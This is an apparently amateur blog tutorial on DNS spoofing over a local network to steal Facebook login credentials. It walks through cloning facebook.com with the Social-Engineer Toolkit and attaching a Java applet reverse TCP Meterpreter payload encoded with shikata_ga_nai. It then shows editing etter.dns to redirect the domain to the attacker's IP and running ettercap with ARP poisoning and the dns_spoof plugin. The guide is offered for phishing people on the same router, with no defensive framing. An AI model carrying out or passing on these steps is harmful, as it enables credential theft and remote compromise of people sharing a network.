DNS Spoffing [Man in middle attack

 🌀  🌀


What Is DNS Spoofing?

DNS spoofing is an attack that can categorize under Man-In-The-Middle-Attack, beside DNS Spoofing MIMA contain:

-ARP poisoning

-Sessions hijacking

-SSL hijacking

-DNS Spoofing


Ill only be showing u DNS Spoofing , For now .. !


How does it work ?

Man in the middle attack means that the hacker will clone a specific web site such as facebook.com/twitter/google etc.... and force the victim to enter his cloned page , And phishe his login creedintals ... ( this only works on ur local connection ) Like , You can phishe People on the same router u are.

To under stand It more likely , Ill show u a pic for example:

Posted Image

I guess u got it ?



Requirements:

1-Linux operating system ( IMPORTANT )

2-Basic knowledge with Linux commands ( Important )

3-A brain ( SUPEREME INPORTANT)


First off ill be adding pics when i get some time , Cus its pain in the ass to show u every thing with pics .

Steps:

1-Setting Java applet attack / Clonning a specific web site " Ill clone facebook.com "

2-Setting the DNS spoofing blugin useing ettercap


First off:

We will open a terminal And type in


cd /pentest/exploits/set


Then


./SET


Now we will get our exploit on and running , Now we are going to choose it like so :


WebSite attack vectors/Java applet attack method /Clone web site / Enter the web site u want to clone ..

Then after it finish clonning , Use the

TCP reverse meter preter payload

Then we will use the following exploits : shikata_ga_nai


Insert an opened port after that ...

It will ask you to

create a Linux/OSX reverse_tcp meterpreter Java Applet payload also?

And we will type "no"


Then we are done for the java applet setting ....

Now comes the reall hacking

Open a new terminal and type


locate etter.dns


Then it will show u a directory of the tool


nano <Directory of the tool>



Without the <> ofc.

Now it will load the tool , We will scroll down till we see

3 lines with microsoft.com

Change them all to facebook.com without removed the *. in the 2nd line

And without closing this terminal , We will open a new one , And type


ifconfig


Now we will copy our local addrress its usually like


192.168.2.xxx



And ofc we will replace it with the ip's infront of the 3 lines of microsoft.com

Now we will press CTRL+O and type y And then y again untill it says

xx lines wrote

Then we will press CTRL+X

Then we will execute what we have done useing


ettercap -T -q -i eth0 -P dns_spoof -M arp // //


Then it will load our Etter cap Wink and then It will tell you

facebook.com spoofed to [192.168.2.xx]

Now every one on ur own local connection Visits facebook.com

and insert his infoz and login , You will be informated with the login infoz Wink.


Present by:-msijbkk


❌ Share and #pin our channel ❌

No comments:

Post a Comment

How to Create custom Spark skins as MXML components in Adobe Flex (Spark architecture).mp4

  Download  How to create custom Spark skins as MXML components.mp4 Creating custom Spark skins as MXML components in Adobe Flex (Spark arc...